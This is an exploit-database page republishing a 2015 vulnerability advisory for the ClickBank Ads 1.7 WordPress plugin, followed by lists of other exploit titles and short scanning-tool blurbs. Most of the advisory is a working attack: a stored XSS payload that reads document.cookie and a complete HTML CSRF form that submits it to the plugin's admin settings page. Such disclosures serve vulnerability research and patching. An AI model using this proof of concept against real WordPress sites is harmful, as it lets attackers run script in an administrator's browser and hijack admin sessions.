Menu

Search for hundreds of thousands of exploits

"WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery"

Author

Exploit author

"Kaustubh G. Padwad"

Platform

Exploit platform

php

Release date

Exploit published date

2015-05-08

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
================================================================
CSRF/Stored XSS Vulnerability in ClickBank Ads V 1.7 Plugin 
================================================================


. contents:: Table Of Content

Overview
========

* Title :CSRF and Stored XSS Vulnerability in ClickBank Ads  Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/clickbank-ads-clickbank-widget/
* Severity: HIGH
* Version Affected: Version  1.7 and mostly prior to it
* Version Tested : Version  1.7
* version patched:

Description 
===========

Vulnerable Parameter 
--------------------
* Title:

About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)
=========================

After installing the plugin

1. Goto Dashboard --> Setting --> ClickBank Ads --> Title

2. Insert this payload ## "><script>+-+-1-+-+alert(document.cookie)</script> ## Into  above mention Vulnerable parameter Save settings and see XSS in action

3. Visit Click Ads settings page of this plugin anytime later and you can see the script executing as it is stored.

Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below

CSRF POC Code
=============

<html>
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/options-general.php?page=clickbank-ads-clickbank-widget/clickbank-ads.php" method="POST">
      <input type="hidden" name="cbwec[title]" value="">>><script>+-+-1-+-+alert(document.cookie)</script>" />
      <input type="hidden" name="cbwec[name]" value="kaustubh" />
      <input type="hidden" name="cbwec[keywordbytitle2]" value="Title" />
      <input type="hidden" name="cbwec[keywords]" value="" />
      <input type="hidden" name="cbwec[adformat]" value="1" />
      <input type="hidden" name="cbwec[width2]" value="100%" />
      <input type="hidden" name="cbwec[width]" value="100%" />
      <input type="hidden" name="cbwec[height]2" value="220" />
      <input type="hidden" name="cbwec[height]" value="220" />
      <input type="hidden" name="cbwec[pos]" value="Top" />
      <input type="hidden" name="cbwec[bordstyle]" value="1" />
      <input type="hidden" name="cbwec[bordcolor]" value="CCCCCC" />
      <input type="hidden" name="cbwec[linkcolor]" value="0000FF" />
      <input type="hidden" name="cbwec[runplugin]" value="1" />
      <input type="hidden" name="cbwec[homepage]" value="1" />
      <input type="hidden" name="cbwec[onlypost]" value="1" />
      <input type="hidden" name="cbwec_submit" value="Save »" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2016-02-16 "ManageEngine OPutils 8.0 - Multiple Vulnerabilities" webapps multiple "Kaustubh G. Padwad"
2016-02-16 "ManageEngine Network Configuration Management Build 11000 - Privilege Escalation" webapps multiple "Kaustubh G. Padwad"
2016-02-02 "Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery" webapps multiple "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ultimate Profile Builder 2.3.3 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery" webapps windows "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected